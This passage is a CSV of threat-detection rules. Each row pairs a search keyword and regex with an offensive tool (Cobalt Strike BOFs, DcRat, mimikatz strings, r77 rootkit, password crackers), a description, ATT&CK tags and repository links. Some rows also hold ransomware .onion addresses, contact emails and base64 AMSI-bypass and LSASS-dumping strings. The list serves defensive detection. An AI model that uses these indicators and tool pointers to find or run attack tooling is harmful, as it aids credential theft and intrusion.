"*Quiet Riot discovered one valid login account*",".{0,1000}Quiet\sRiot\sdiscovered\sone\svalid\slogin\saccount.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","56181"
"*quiet_riot --scan_type*",".{0,1000}quiet_riot\s\-\-scan_type.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","56182"
"*quser.x64.o*",".{0,1000}quser\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","56183"
"*quser.x86.o*",".{0,1000}quser\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","56184"
"*quser;net sessions;query session;klist sessions*",".{0,1000}quser\;net\ssessions\;query\ssession\;klist\ssessions.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","56185"
"*qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion*",".{0,1000}qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56186"
"*QW1zaVNjYW5CdWZmZXI=*",".{0,1000}QW1zaVNjYW5CdWZmZXI\=.{0,1000}","offensive_tool_keyword","base64","AMSI Bypass AmsiScanBuffer in base64","T1562.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","56187"
"*QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABiAGEAYwBrAHUAcAAuAGUAbgBjAA==*",".{0,1000}QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABiAGEAYwBrAHUAcAAuAGUAbgBjAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","56188"
"*QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAGQAYQB0AA==*",".{0,1000}QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAGQAYQB0AA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","56189"
"*QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAHoAaQBwAA==*",".{0,1000}QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAHoAaQBwAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","56190"
"*qwqdanchun*",".{0,1000}qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56192"
"*qwqdanchun/DcRat*",".{0,1000}qwqdanchun\/DcRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56193"
"*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*",".{0,1000}QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA.{0,1000}","offensive_tool_keyword","mimikatz","invoke mimiaktz string found used by the tool EDRaser ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","56194"
"*QXh4OEF4eDhBeHg4QXh4OA==*",".{0,1000}QXh4OEF4eDhBeHg4QXh4OA\=\=.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","56195"
"*r00t0v3rr1d3/merlin*",".{0,1000}r00t0v3rr1d3\/merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","56196"
"*r00t-3xp10it/venom/master/bin/void.zip*",".{0,1000}r00t\-3xp10it\/venom\/master\/bin\/void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56197"
"*r0oth3x49/ghauri*",".{0,1000}r0oth3x49\/ghauri.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","56198"
"*r0oth3x49/Tor.git*",".{0,1000}r0oth3x49\/Tor\.git.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","56199"
"*r0oth3x49@gmail.com*",".{0,1000}r0oth3x49\@gmail\.com.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#email","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","56200"
"*r1cksec/thoth*",".{0,1000}r1cksec\/thoth.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","56201"
"*r2pm -i dirtycow*",".{0,1000}r2pm\s\-i\sdirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","56202"
"*r3F0rM47(listt*",".{0,1000}r3F0rM47\(listt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","56203"
"*r4wd3r/RID-Hijacking*",".{0,1000}r4wd3r\/RID\-Hijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","56204"
"*r4wd3r/Suborner*",".{0,1000}r4wd3r\/Suborner.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","56205"
"*r77Rootkit%201.5.2.zip*",".{0,1000}r77Rootkit\%201\.5\.2\.zip.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","56206"
"*Radare2*",".{0,1000}Radare2.{0,1000}","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Discovery","https://github.com/radareorg/radare2","1","0","N/A","N/A","N/A","10","21551","3061","2025-04-22T19:53:00Z","2012-07-03T07:42:26Z","56207"
"*radius2john.pl*",".{0,1000}radius2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56208"
"*radius2john.py*",".{0,1000}radius2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56209"
"*RagingRotator-main.*",".{0,1000}RagingRotator\-main\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","56215"
"*ragnar0k@ctemplar.com*",".{0,1000}ragnar0k\@ctemplar\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56216"
"*ragnarjtm25k3w4cy6kvfttfhm24mpynikjt7yll5pvpfo4a7yuzweyd.onion*",".{0,1000}ragnarjtm25k3w4cy6kvfttfhm24mpynikjt7yll5pvpfo4a7yuzweyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56217"
"*ragnarmj3hlykxstyanwtgf33eyacccleg45ctygkuw7dkgysict6xyd.onion*",".{0,1000}ragnarmj3hlykxstyanwtgf33eyacccleg45ctygkuw7dkgysict6xyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56218"
"*raheemabass55@gmail.com*",".{0,1000}raheemabass55\@gmail\.com.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#email","N/A","9","","N/A","","","","56219"
"*RAI/ase_docker*",".{0,1000}RAI\/ase_docker.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56220"
"*rai-attack-servers.*",".{0,1000}rai\-attack\-servers\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56221"
"*Raikia/SMBCrunch*",".{0,1000}Raikia\/SMBCrunch.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","56222"
"*RainbowCrack*",".{0,1000}RainbowCrack.{0,1000}","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. visit the RainbowCrack homepage","T1110 - T1027 - T1071 - T1090 - T1621","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","56223"
"*rai-redirector-dns*",".{0,1000}rai\-redirector\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56224"
"*rai-redirector-http*",".{0,1000}rai\-redirector\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 